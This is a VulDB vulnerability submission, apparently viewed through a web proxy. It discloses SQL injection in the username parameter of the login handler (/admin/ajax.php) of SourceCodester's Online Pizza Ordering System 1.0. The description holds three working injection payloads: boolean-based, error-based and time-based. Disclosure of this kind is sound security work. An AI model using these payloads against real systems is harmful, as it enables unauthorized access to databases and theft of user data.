[go: up one dir, main page]
More Web Proxy on the site http://driver.im/

Submit #100928: SQL injection vulnerability exists in username parameter of Online Pizza Ordering SystemИнформация

TitleSQL injection vulnerability exists in username parameter of Online Pizza Ordering System
DescriptionSQL injection vulnerability exists in username parameter of /admin/ajax.php file of Online Pizza Ordering System Important user data or system data may be leaked and system security may be compromised The environment is secure and the information can be used by malicious users. When visit /admin/ajax.php and action parameter is ‘login’,it will include admin_class.php,and username parameter can do sql injection. Payload:username=admin' AND 2019=2019-- pyju&password=admin123 or username=admin' AND (SELECT 4140 FROM(SELECT COUNT(*),CONCAT(0x7170707871,(SELECT (ELT(4140=4140,1))),0x716b7a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- xsOC&password=admin123 or username=admin' AND (SELECT 9716 FROM (SELECT(SLEEP(5)))PnRb)-- aily&password=admin123
Source⚠️ https://github.com/E1CHO/cve_hub/blob/main/Online%20Pizza%20Ordering%20System/Online%20Pizza%20Ordering%20System%20sql%20vlun(3).pdf
User
 SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936)
Submission13.03.2023 06:21 (2 лет назад)
Moderation13.03.2023 08:19 (2 hours later)
Statusпринято
VulDB Entry222872 [SourceCodester Online Pizza Ordering System 1.0 /admin/ajax.php username sql injection]
Points20

Do you need the next level of professionalism?

Upgrade your account now!